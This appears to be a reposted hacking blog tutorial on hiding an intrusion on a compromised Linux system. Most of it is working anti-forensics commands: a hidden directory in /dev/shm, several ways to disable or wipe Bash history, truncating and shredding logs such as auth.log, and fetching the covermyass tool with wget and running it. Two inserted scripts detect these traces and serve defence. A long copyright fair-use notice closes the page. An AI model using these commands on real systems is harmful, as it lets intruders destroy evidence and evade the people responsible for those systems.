HOW TO Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected


    by atharva pawar (hackerz2426k.blogspot.com)



For an attacker, the final stage of exploitation is covering their tracks: wiping activity traces and logs so that the intrusion is not detected. This matters especially for persistence, when the attacker intends to access the target again in the future.

To show you the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system. You can check out the Cyber Weapons Lab video that walks through this guide, or skip below to get right to the written steps.

Step 1: Compromise a Target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands to get a shell. We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

Step 2: Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:

root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with the mkdir command and by prepending the name with a dot:

root@target:/# mkdir /dev/shm/.secret

If we list the contents of /dev/shm now, nothing shows up:

root@target:/# ls -l /dev/shm/

total 0

Only when we use the -a switch to list all files and directories does it show up:

root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret

And to remove the directory once we are finished on the machine, use the rmdir command:

root@target:/# rmdir /dev/shm/.secret/

Step 3: Delete the Bash History

Bash keeps the commands of the current session in memory and writes them to the history file when the session ends, so it's important to clear it to cover your tracks. We can view the current history with the history command:

root@target:/# history

    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

Commands are written to the file named by the HISTFILE environment variable, which is usually ~/.bash_history. We can echo it to see the location:

root@target:/# echo $HISTFILE

/root/.bash_history

We can use the unset command to remove the variable:

root@target:/# unset HISTFILE

So when we echo it again, nothing shows up:

root@target:/# echo $HISTFILE

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

root@target:/# export HISTFILE=/dev/null

And the history will now be sent to /dev/null (nowhere):

root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:

root@target:/# HISTSIZE=0

Alternatively, use the export command:

root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:

root@target:/# HISTFILESIZE=0

Or with export:

root@target:/# export HISTFILESIZE=0

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@target:/# set +o history

And to enable it again:

root@target:/# set -o history

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@target:/# shopt -ou history

And to enable it again:

root@target:/# shopt -os history

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@target:~#  cat /etc/passwd

That technique doesn't work all the time: it only takes effect when the HISTCONTROL variable includes ignorespace or ignoreboth, so it depends on the system's configuration.

We can also just clear the history using the -c switch:

root@target:~# history -c

To make sure the changes are written to disk, use the -w switch:

root@target:~# history -w

That only clears the history of the current session. To absolutely make sure the history file is also emptied when exiting a session, the following command comes in handy:

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to exit the session without saving history:

root@target:/# kill -9 $$
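
From the defender's side, the settings in this step are exactly what a host audit should look for. The following script is an added example, not part of the original post or of any tool it mentions: audit_rc_file scans a shell startup file for the history-disabling directives shown above (ignoring commented-out lines), and history_file_state classifies a user's history file as missing, empty, a symlink to /dev/null, or ordinary. The startup file, the history files and the temporary directory are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a shell startup file for
# the history-disabling directives described in Step 3, and classify a user's
# history file. Sample inputs below are constructed in a temporary directory.

# Extended regex covering each directive shown in Step 3.
HISTORY_KILL_PATTERNS='unset[[:space:]]+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0([[:space:]]|$)|HISTFILESIZE=0([[:space:]]|$)|set[[:space:]]+\+o[[:space:]]+history|shopt[[:space:]]+-ou[[:space:]]+history'

# audit_rc_file FILE
# Prints "file:line: text" for every live (non-comment) directive that disables
# or redirects history. Returns 1 if any was found, 0 if the file is clean.
audit_rc_file() {
    file="$1"
    [ -r "$file" ] || return 0
    found=0
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        code=${line%%#*}      # drop trailing comments so "# set +o history" is ignored
        if printf '%s\n' "$code" | grep -Eq "$HISTORY_KILL_PATTERNS"; then
            printf '%s:%d: %s\n' "$file" "$n" "$line"
            found=1
        fi
    done < "$file"
    return "$found"
}

# history_file_state FILE
# Prints one of: devnull-symlink, missing, empty, ok.
history_file_state() {
    f="$1"
    if [ -L "$f" ] && [ "$(readlink "$f")" = "/dev/null" ]; then
        echo devnull-symlink; return 0
    fi
    [ -e "$f" ] || { echo missing; return 0; }
    [ -s "$f" ] || { echo empty; return 0; }
    echo ok
}

# --- demonstration on constructed data -------------------------------------
demo_dir=$(mktemp -d)
cat > "$demo_dir/bashrc.sample" <<'EOF'
# constructed sample startup file
export PATH=$PATH:/usr/local/bin
HISTSIZE=1000                 # legitimate: must not alert
export HISTFILE=/dev/null     # must alert
set +o history                # must alert
# shopt -ou history           # commented out: must not alert
EOF
: > "$demo_dir/empty_history"
ln -s /dev/null "$demo_dir/null_history"

if audit_rc_file "$demo_dir/bashrc.sample"; then
    echo "no history-disabling directives in $demo_dir/bashrc.sample"
else
    echo "ALERT: history disabled in $demo_dir/bashrc.sample"
fi
for h in empty_history null_history no_such_history bashrc.sample; do
    printf '%-18s %s\n' "$h" "$(history_file_state "$demo_dir/$h")"
done
# (the temporary directory is left in place for inspection)
```

On a real host, run it as the account being audited and point audit_rc_file at ~/.bashrc, ~/.bash_profile, ~/.profile and the files under /etc/profile.d in turn; because a clean file returns 0, the function slots straight into a cron job or a configuration-management check. A history file that is unexpectedly empty, missing, or a symlink to /dev/null for an account that is known to log in interactively is worth a closer look at the rest of that account's environment.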

Step 4: Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:

  • /var/log/auth.log: authentication
  • /var/log/cron.log: cron jobs
  • /var/log/maillog: mail
  • /var/log/httpd: Apache

Of course, we can simply remove a log with the rm command:

root@target:/# rm /var/log/auth.log

But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:

root@target:/# truncate -s 0 /var/log/auth.log

Note that truncate is not present on all systems.

We can accomplish nearly the same thing by echoing an empty string into the file (this leaves a single newline byte behind rather than a zero-byte file):

root@target:/# echo '' > /var/log/auth.log

And also with > by itself to empty the file:

root@target:/# > /var/log/auth.log

We can also send it to /dev/null:

root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file's contents with random data:

root@target:/# shred /var/log/auth.log

We can even tack on -zu: -z adds a final pass of zeros to hide the evidence of shredding, and -u truncates and then removes the file afterward:

root@target:/# shred -zu /var/log/auth.log
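
Each of the wiping methods above leaves a recognizable end state, which is what a log-integrity check should key on. The script below is an added example, not from the original post: classify_log reports a log that is empty (truncate, >, cat /dev/null, tee, dd), newline-only (echo ''), or made mostly of non-text bytes (shred's random data or its -z zero pass), and snapshot_log / check_against_baseline use a stored size-and-inode baseline to catch a file that was cut down in place. The auth.log lines, the wiped copies and the temporary directory are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): flag the end states left by the
# log-wiping methods in Step 4, and detect in-place truncation against a stored
# size/inode baseline. All sample log content below is constructed.

# classify_log FILE -> missing | empty | newline-only | nontext | ok
classify_log() {
    f="$1"
    [ -e "$f" ] || { echo missing; return 0; }
    size=$(wc -c < "$f" | tr -d ' ')
    [ "$size" -eq 0 ] && { echo empty; return 0; }   # truncate, >, cat /dev/null, tee, dd
    # A single 0x0a byte is what `echo '' > file` leaves behind.
    if [ "$size" -eq 1 ] && [ "$(od -An -tx1 < "$f" | tr -d ' \n')" = "0a" ]; then
        echo newline-only; return 0
    fi
    # Bytes outside printable ASCII and whitespace, counted per byte (C locale).
    # A text log has close to none; shred's random data and a zero pass are
    # mostly such bytes. Flag when they exceed 10% of the file.
    nonprint=$(LC_ALL=C tr -d '[:print:][:space:]' < "$f" | wc -c | tr -d ' ')
    if [ $((nonprint * 10)) -gt "$size" ]; then
        echo nontext; return 0
    fi
    echo ok
}

# snapshot_log FILE -> "INODE SIZE", the baseline a monitor should store off-host
snapshot_log() {
    ino=$(ls -i "$1" | awk '{print $1}')
    size=$(wc -c < "$1" | tr -d ' ')
    echo "$ino $size"
}

# check_against_baseline FILE "INODE SIZE" -> replaced | shrunk | grown | unchanged
# Same inode but smaller means the file was emptied or cut in place; a new inode
# means it was removed or rotated; growth is the normal case for a log.
check_against_baseline() {
    cur=$(snapshot_log "$1")
    base_ino=${2%% *}; base_size=${2##* }
    cur_ino=${cur%% *}; cur_size=${cur##* }
    if [ "$cur_ino" != "$base_ino" ]; then echo replaced
    elif [ "$cur_size" -lt "$base_size" ]; then echo shrunk
    elif [ "$cur_size" -gt "$base_size" ]; then echo grown
    else echo unchanged
    fi
}

# --- demonstration on constructed data -------------------------------------
demo=$(mktemp -d)
cat > "$demo/auth.log" <<'EOF'
Jun 19 13:41:02 target sshd[1021]: Accepted password for admin from 10.0.0.5 port 51022 ssh2
Jun 19 13:41:02 target sshd[1021]: pam_unix(sshd:session): session opened for user admin by (uid=0)
Jun 19 13:49:10 target sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/bash
EOF
baseline=$(snapshot_log "$demo/auth.log")

# Reproduce each wiping end state on a copy (the constructed original is kept).
cp "$demo/auth.log" "$demo/truncated.log"; : > "$demo/truncated.log"
cp "$demo/auth.log" "$demo/echoed.log";    echo '' > "$demo/echoed.log"
cp "$demo/auth.log" "$demo/zeroed.log";    dd if=/dev/zero of="$demo/zeroed.log" bs=256 count=1 2>/dev/null
cp "$demo/auth.log" "$demo/shrunk.log";    shrunk_base=$(snapshot_log "$demo/shrunk.log")
head -n 1 "$demo/auth.log" > "$demo/shrunk.log"   # cut in place: same inode, smaller

for name in auth truncated echoed zeroed shrunk nope; do
    printf '%-14s %s\n' "$name.log" "$(classify_log "$demo/$name.log")"
done
printf 'auth.log vs baseline:   %s\n' "$(check_against_baseline "$demo/auth.log" "$baseline")"
printf 'shrunk.log vs baseline: %s\n' "$(check_against_baseline "$demo/shrunk.log" "$shrunk_base")"
```

The content checks work on a single pass, but the baseline is what catches a partial edit: a log that keeps its inode and gets smaller outside a logrotate window has been truncated, and that is the case none of the byte-level checks can see. Store the snapshots somewhere the host itself cannot overwrite, and treat a "nontext" result on a syslog-format file as a strong signal, since nothing legitimate writes zero-filled or random bytes there.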

Step 5: Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that automates much of the process we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Head to a writable directory, and use chmod to make it executable:

root@target:/tmp# chmod +x covermyass

Then we can run it:

root@target:/tmp# ./covermyass

Welcome to Cover my ass tool !

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clear everything in a hurry, simply append now to the command:

root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Wrapping Up

Today, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

If you like our content, subscribe. Thank you!

Copyright Disclaimer under section 107 of the Copyright Act 1976, allowance is made for “fair use” for purposes such as criticism, comment, news reporting, teaching, scholarship, education and research.

Fair use is a use permitted by copyright statute that might otherwise be infringing. 

Non-profit, educational or personal use tips the balance in favor of fair use. 

One of the rights accorded to the owner of copyright is the right to reproduce or to authorize others to reproduce the work in copies or phonorecords.  This right is subject to certain limitations found in sections 107 through 118 of the copyright law (title 17, U.S. Code).  One of the more important limitations is the doctrine of “fair use”.  The doctrine of fair use has developed through a substantial number of court decisions over the years and has been codified in section 107 of the copyright law. 

Section 107 contains a list of the various purposes for which the reproduction of a particular work may be considered fair, such as criticism, comment, news reporting, teaching, scholarship, and research. Section 107 also sets out four factors to be considered in determining whether or not a particular use is fair:

1. The purpose and character of the use, including whether such use is of commercial nature or is for nonprofit educational purposes

2. The nature of the copyrighted work

3. The amount and substantiality of the portion used in relation to the copyrighted work as a whole

4. The effect of the use upon the potential market for, or value of, the copyrighted work

The distinction between fair use and infringement may be unclear and not easily defined. There is no specific number of words, lines, or notes that may safely be taken without permission. Acknowledging the source of the copyrighted material does not substitute for obtaining permission.

The 1961 Report of the Register of Copyrights on the General Revision of the U.S. Copyright Law cites examples of activities that courts have regarded as fair use: “quotation of excerpts in a review or criticism for purposes of illustration or comment; quotation of short passages in a scholarly or technical work, for illustration or clarification of the author’s observations; use in a parody of some of the content of the work parodied; summary of an address or article, with brief quotations, in a news report; reproduction by a library of a portion of a work to replace part of a damaged copy; reproduction by a teacher or student of a small part of a work to illustrate a lesson; reproduction of a work in legislative or judicial proceedings or reports; incidental and fortuitous reproduction, in a newsreel or broadcast, of a work located in the scene of an event being reported.”

Copyright protects the particular way an author has expressed himself. It does not extend to any ideas, systems, or factual information conveyed in the work.

The safest course is always to get permission from the copyright owner before using copyrighted material. The Copyright Office cannot give this permission.

When it is impracticable to obtain permission, use of copyrighted material should be avoided unless the doctrine of fair use would clearly apply to the situation. The Copyright Office can neither determine if a certain use may be considered fair nor advise on possible copyright violations. If there is any doubt, it is advisable to consult an attorney.

FL-102, Revised September 2010
